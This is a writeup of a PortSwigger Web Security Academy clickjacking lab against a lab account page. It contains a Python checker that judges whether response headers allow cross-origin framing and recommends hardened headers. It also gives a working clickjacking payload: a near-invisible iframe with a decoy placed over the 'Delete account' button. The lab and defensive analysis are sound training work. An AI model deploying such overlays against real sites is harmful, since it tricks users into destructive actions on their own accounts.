Platform: PortSwigger Web Security Academy
Type: Clickjacking
Difficulty: Apprentice
Target: 0a72006704cb27d982408dab005600d0.web-security-academy.net
Objective: Trick the victim into clicking "Delete account" by overlaying a decoy button on top of it via iframe

Basic Clickjacking with CSRF Token Protection — Writeup


Initial Observation

Logged in as wiener:peter. The account page has an update email form and a delete account button. Inspecting the form:

<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
    <label>Email</label>
    <input required="" type="email" name="email" value="">
    <input required="" type="hidden" name="csrf" value="xlSG7VVbUh5a0PJfgmt6zPfgD3cMuRno">
    <button class="button" type="submit"> Update email </button>
</form>

There's a CSRF token on the form — but that doesn't matter for clickjacking. The attack doesn't forge a request, it tricks the user into making the real one themselves. As long as the page can be loaded in an iframe, the CSRF token is irrelevant.
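The point above is that the only thing standing between an attacker and this click is whether the browser will frame the page at all. The check below, added to this writeup and not part of the lab or PortSwigger's code, evaluates a response's headers the way a browser does (a CSP frame-ancestors directive wins, otherwise X-Frame-Options applies) and returns the header set the account page should have sent. All header sets in it are constructed samples; the lab's real response headers were not captured here, and the attacker origin is a placeholder.

```python
"""Decide whether a page's response headers allow cross-origin framing.

Added example for this writeup, not lab or PortSwigger code.
Sample headers below are constructed; the origin names are placeholders.
"""


def frame_ancestors(csp: str):
    """Return the frame-ancestors source list from a CSP value, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]  # empty list == 'none'
    return None


def is_frameable(headers: dict, attacker_origin: str = "https://exploit.example") -> tuple:
    """Return (frameable, reason) for a cross-origin page at attacker_origin.

    Browser precedence: when CSP carries frame-ancestors, X-Frame-Options is
    ignored; otherwise X-Frame-Options DENY / SAMEORIGIN blocks cross-origin
    framing. ALLOW-FROM is not honoured by current browsers, so it is treated
    as no restriction.
    """
    h = {k.lower(): v for k, v in headers.items()}

    csp = h.get("content-security-policy")
    if csp is not None:
        fa = frame_ancestors(csp)
        if fa is not None:
            if not fa or fa == ["'none'"]:
                return False, "CSP frame-ancestors 'none'"
            if "*" in fa or attacker_origin.lower() in fa:
                return True, f"CSP frame-ancestors permits {attacker_origin}"
            return False, f"CSP frame-ancestors limited to {' '.join(fa)}"

    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo in ("deny", "sameorigin"):
        return False, f"X-Frame-Options {xfo.upper()}"
    # No effective restriction: the CSRF token on the form changes nothing,
    # because the victim's own browser submits the real form with a valid token.
    return True, "no framing restriction"


def hardened_headers() -> dict:
    """Headers the account page should send so it cannot be embedded cross-origin."""
    return {
        "Content-Security-Policy": "frame-ancestors 'self'",
        "X-Frame-Options": "SAMEORIGIN",  # fallback for browsers without CSP frame-ancestors
    }


if __name__ == "__main__":
    samples = {
        "lab-like (no headers)": {},
        "X-Frame-Options DENY": {"X-Frame-Options": "DENY"},
        "CSP 'none'": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
        "CSP wildcard overrides XFO": {
            "Content-Security-Policy": "frame-ancestors *",
            "X-Frame-Options": "DENY",
        },
        "hardened": hardened_headers(),
    }
    for name, hdrs in samples.items():
        ok, why = is_frameable(hdrs)
        print(f"{name:30} frameable={ok!s:5} ({why})")
```

Running the module prints one verdict per sample set; the lab-like response (no headers) is the only reason the overlay in the next section works, and the hardened set is what closes it.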


Attack Path

Building the Clickjacking Page

The idea is simple: load the target account page inside a transparent iframe, then place a visible "click" element precisely on top of the delete account button. The victim thinks they're clicking the decoy, but they're actually hitting the real button underneath.

Setting the exploit server body to:

<style>
    iframe {
        width: 500px;
        height: 600px;
        /* near-transparent so the victim sees only the decoy text */
        opacity: 0.001;
    }

    div {
        /* decoy positioned over the "Delete account" button inside the frame */
        position: absolute;
        top: 500px;
        left: 40px;
    }
</style>

<div>click</div>

<iframe src="https://0a72006704cb27d982408dab005600d0.web-security-academy.net/my-account"></iframe>

The "click" text sits right on top of the delete account button. With opacity: 0.001 the iframe is invisible to the victim — they just see the decoy text and click it.


Deliver exploit to victim → account deleted → lab solved :P


Resources